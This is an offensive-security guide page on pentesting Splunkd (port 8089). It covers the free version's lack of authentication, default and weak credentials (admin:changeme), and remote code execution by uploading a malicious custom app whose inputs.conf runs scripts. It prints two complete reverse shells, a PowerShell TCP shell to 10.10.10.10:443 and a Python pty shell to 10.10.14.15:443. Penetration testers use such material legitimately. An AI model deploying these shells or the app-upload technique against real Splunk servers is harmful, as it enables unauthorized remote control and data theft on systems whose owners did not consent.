8089 - Pentesting Splunkd
[AD REMOVED]
Basic Information
- Log analytics tool used for data gathering, analysis, and visualization
- Commonly used in security monitoring and business analytics
- Default ports:
- Web server: 8000
- Splunkd service: 8089
Vulnerability Vectors:
-
Free Version Exploitation
-
Trial version automatically converts to free version after 60 days
- Free version lacks authentication
- Potential security risk if left unmanaged
-
Administrators may overlook security implications
-
Credential Weaknesses
-
Older versions: Default credentials
admin:changeme
- Newer versions: Credentials set during installation
-
Potential for weak password use (e.g.,
admin
,Welcome
,Password123
) -
Remote Code Execution Opportunities
-
Multiple code execution methods:
- Server-side Django applications
- REST endpoints
- Scripted inputs
- Alerting scripts
- Cross-platform support (Windows/Linux)
- Scripted inputs can run:
- Bash scripts
- PowerShell scripts
- Batch scripts
Key Exploitation Potential:
- Sensitive data storage
- Lack of authentication in free version
- Multiple vectors for potential remote code execution
- Possibility of leveraging scripted inputs for system compromise
Shodan
Splunk build
RCE
Create Custom Application
Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.
A custom application can run Python, Batch, Bash, or PowerShell scripts. Moreover, Splunk comes with Python installed, so even in Windows systems you will be able to run python code.
You can use this example with the bin
containing example for Python and PowerShell. Or you could create your own.
The exploitation process follows a consistent methodology across platforms:
The critical configuration file inputs.conf
enables the script by:
- Setting
disabled = 0
- Configuring a 10-second execution interval
- Defining the script's source type
Deployment is straightforward:
- Create the malicious application package
- Set up a listener (Netcat/socat) on the attacking machine
- Upload the application through Splunk's interface
- Trigger automatic script execution upon upload
Sample Windows PowerShell reverse shell:
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Sample Linux Python reverse shell:
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
RCE & Privilege Escalation
In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:
{{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}}
References
[AD REMOVED]